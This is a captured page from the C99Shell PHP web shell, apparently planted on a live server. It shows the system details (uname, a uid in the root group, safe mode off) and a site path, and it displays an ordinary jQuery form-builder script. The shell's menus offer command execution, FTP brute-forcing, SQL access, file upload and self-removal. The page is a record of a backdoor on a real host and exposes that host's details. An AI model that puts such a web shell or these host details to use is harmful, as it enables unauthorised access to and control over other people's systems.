!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/public/js/customer/   drwxr-xr-x
Free 28.39 GB of 117.98 GB (24.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.js (1.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"use strict";
$('#addformtable').DataTable({
    processing: true,
    serverSide: true,
    responsive:true,
    ajax:'/form/get',
    columns: [
        { "data": "title" },
        { "data": "created_at" },
        { "data": "action" },
    ]
});

    $(document).ready(function(){
        let i = 0;
        $('#add_button').on('click',function(e){
            e.preventDefault();
            let data_row_id = i++;
            const fieldHTML = `<div class="form-group" id="form-row_${data_row_id}"><div class="row"><div class="col-lg-4"><input value="" type="text" name="input_name[]" class="form-control" id="input_name" placeholder="@lang('customer.name')"></div><div class="col-lg-3"><select class="form-control" name="input_type[]" id="input_type"> <option value="checkbox">Checkbox</option><option value="input">Input</option><option value="textarea">Textarea</option><option value="radio">Radio</option></select></div><div class="col-lg-4"><input value="" type="text" name="input_label[]" class="form-control" id="input_label" placeholder="@lang('customer.label')"></div><div class="col-lg-1"><button type="button" class="btn btn-danger float-right remove_button" id="remove_button_${data_row_id}" data-id="${data_row_id}"><i class="fas fa-minus-circle"></i></button></div></div></div>`;
            $('#form-row').attr('row-id', data_row_id)
            $('.field_wrapper').prepend(fieldHTML);

        });

        $(document).on('click', '.remove_button', function (e) {
            let id = $(this).attr('data-id')
            $('#form-row_'+id).remove()
        })
    });

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--